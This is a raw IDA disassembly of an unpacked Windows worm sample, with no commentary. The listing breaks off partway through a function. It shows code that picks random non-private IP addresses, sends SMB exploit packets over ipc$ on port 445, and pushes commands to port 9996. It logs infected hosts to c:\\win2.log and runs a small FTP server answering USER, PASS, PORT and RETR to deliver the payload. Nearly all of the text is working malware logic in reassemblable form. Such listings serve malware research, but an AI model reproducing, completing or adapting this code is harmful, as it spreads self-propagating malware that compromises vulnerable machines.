;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 109AD04130F7C6420C2CAF10A2DF96E4
; File Name : u:\work\109ad04130f7c6420c2caf10a2df96e4_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401EF0:loc_401F35�p ...
mov eax, dword_406F30
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F30, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_402029+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F30, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_402029+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_405114
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_40510C
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401EF0+1A�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_405104
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405110
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_405108
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401EF0+E2�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call dword_4050F4
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call dword_4050F8
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_40511C
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_40510C
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405110
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F34
push edi
push dword_406F34
lea eax, [ebp+var_14]
push offset aI ; "%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+var_14]
push esi
push eax
call sub_402210
mov esi, dword_405020
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push edi
call esi ; dword_405020
push [ebp+arg_0]
call sub_402210
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; dword_405020
push edi
call dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 270Ch
call dword_4050F4
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
push 2
call dword_4050F8
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_406F38
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+var_33C]
push eax
call dword_4050E0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_402210
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call dword_4050F0
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_402210
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call dword_40511C
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_406F38
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402290
add esp, 2Ch
push [ebp+arg_0]
call dword_405110
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call dword_4050F8
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call dword_4050F4
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4021B0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, dword_4050F0
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_4050EC
call esi ; dword_4050EC
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_4050EC
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; dword_4050F0
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_4050EC
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call dword_40511C
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_4025D0
mov eax, dword_406A34
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A38
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402290
add esp, 2Ch
push 270Ch
call dword_4050F4
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402290
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4021B0
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402290
lea eax, [ebp+var_14]
push eax
call sub_402210
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402290
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4021B0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402290
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402290
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A2C
push eax
call sub_402290
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402290
add esp, 40h
push esi
call sub_402210
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402290
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4021B0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4021B0
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call dword_4050F8
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call dword_4050F4
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_4021B0
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, dword_4050F0
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_4050EC
call edi ; dword_4050EC
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050EC
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050EC
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050EC
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050EC
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050EC
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402290
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402290
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402290
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402290
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402290
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402290
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402290
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402290
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050EC
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; dword_4050F0
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call dword_405028 ; Sleep
push [ebp+var_4]
call dword_40511C
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: sub_402029+3A�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A40
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; DATA XREF: sub_401E65+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E29
push esi
push edi
push 0
push off_4068D0
call sub_402210
mov esi, dword_4050F0
pop ecx
push eax
push off_4068D0
push ebx
call esi ; dword_4050F0
mov edi, [ebp+arg_0]
jmp short loc_401B46
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: sub_401B08+310�j
mov ebx, [ebp+arg_0]
loc_401B46: ; CODE XREF: sub_401B08+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call dword_4050EC
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401B97
push 0
push off_4068D4
call sub_402210
pop ecx
push eax
push off_4068D4
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401B97: ; CODE XREF: sub_401B08+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401BC8
push 0
push off_4068D8
call sub_402210
pop ecx
push eax
push off_4068D8
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401BC8: ; CODE XREF: sub_401B08+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401CA4
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
mov ax, word_406A60
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402680
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C17: ; CODE XREF: sub_401B08+159�j
test ebx, ebx
jz short loc_401C4B
cmp edi, 4
jge short loc_401C2E
push ebx
call sub_401E30
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C2E: ; CODE XREF: sub_401B08+116�j
jnz short loc_401C3A
push ebx
call sub_401E30
pop ecx
mov [ebp+var_18], eax
loc_401C3A: ; CODE XREF: sub_401B08:loc_401C2E�j
cmp edi, 5
jnz short loc_401C4E
push ebx
call sub_401E30
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C4E
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: sub_401B08+111�j
push 6
pop edi
loc_401C4E: ; CODE XREF: sub_401B08+135�j
; sub_401B08+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402680
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C17
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0
call sub_402210
pop ecx
push eax
push off_4068E0
jmp loc_401DD7
; ---------------------------------------------------------------------------
loc_401CA4: ; CODE XREF: sub_401B08+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401DDC
push 0
push off_4068E4
call sub_402210
pop ecx
push eax
push off_4068E4
push ebx
call esi ; dword_4050F0
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DB9
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call dword_4050F4
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_4050F8
mov ebx, eax
